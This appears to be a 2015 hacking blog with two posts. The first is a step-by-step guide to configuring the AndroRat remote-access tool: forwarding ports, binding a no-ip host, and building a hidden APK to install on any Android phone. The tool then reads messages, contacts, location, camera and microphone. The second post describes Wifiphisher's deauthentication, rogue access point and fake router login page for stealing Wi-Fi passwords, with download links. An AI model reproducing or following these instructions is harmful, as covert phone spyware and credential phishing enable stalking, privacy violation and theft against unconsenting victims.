Khamis, 22 Januari 2015

AndroRat SPY Any Android Device


Androrat (RAT For Android)
Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.The name Androrat is a mix of Android and RAT (Remote Access Tool).The goal of the application is to give the control of the android system remotely and retrieve informations from it.
 Features
  • Get contacts (and all theirs informations)
  • Get call logs
  • Get all messages
  • Location by GPS/Network
  • Monitoring received messages in live
  • Monitoring phone state in live (call received, call sent, call missed..)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Streaming video (for activity based client only)
  • Do a toast
  • Send a text message
  • Give call
  • Open an URL in the default browser
  • Do vibrate the phone
How to configure Androrat :
  1. You have to  make a id on Here and create a host.
  2. You need to open port you want to use.  To do that Open Control panel > Network & Internet > Network & Sharing centre Then click on see full map option Right-Click on the Gateway or router>Properties In general tab, Go to settings , Click on add In Description of service , Write Androrat Now you have to check your ip, To Do this , open command prompt, type ipconfig, Scroll To ethernet Adapter local area connection,and note down the ipv4 address Now come back to Add window , in the name or ip address type the ipv4 address you have noted Now in the external & internal port number , type 81 , tcp should be selected, click ok Now click on Add button again…Now in Description , write androrat 1 In the name or ip address, type the ipv4 address you have noted Now in the external & internal port number , type 81 , udp should be selected, click ok.
  3. Now extract the file , Open AndroRat Binder.exe.
  4. Go to No-ip tab and fill your information & click on update.
  5. Go to Build Tab.
  6. In IP section, type the hostname  you have created by no-ip.
  7. In port section , type 81.
  8. In apk title ,Type any title you want.
  9. Check the hidden box to hide the apk from mobile’s app drawer.
  10. Click on Go.
  11. Now you will see the apk with the title you have given in the extracted folder.
  12. Now install that apk to any android mobile phone.
  13. You will find a folder named Androrat in the extracted files.
  14. Open Androrat>Androrat.jar (you should have java installed in your pc to open it).
  15. Now click on server> Select port and enter 81, click ok & restart it.
  16. Now , as soon as the android client is online , you will find it on the jar file ……select any server online.
  17. Enjoy :) .
 




http://adf.ly/wXKgm

Isnin, 12 Januari 2015

Wifiphisher Wi-Fi Hacking Tool Automates Phishing Attacks


Fast automated phishing attacks against WiFi networks 


About

Wifiphisher is a security tool that mounts fast automated phishing attacks against WiFi networks in order to obtain secret passphrases and other credentials. It is a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages or WPA/WPA2 secret passphrases.
Wifiphisher works on Kali Linux and is licensed under the MIT license.
From the victim's perspective, the attack makes use in three phases:
  1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
  2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
  3. Victim is being served a realistic router config-looking page. wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials, for example one that asks WPA password confirmation due to a router firmware upgrade.

Performing MiTM attack



























Screenshots


Targeting an access point

A successful attack

Fake router configuration page

Download of original script
http://adf.ly/wBB3d


Download fixed wifiphisher.py :
http://adf.ly/wBClu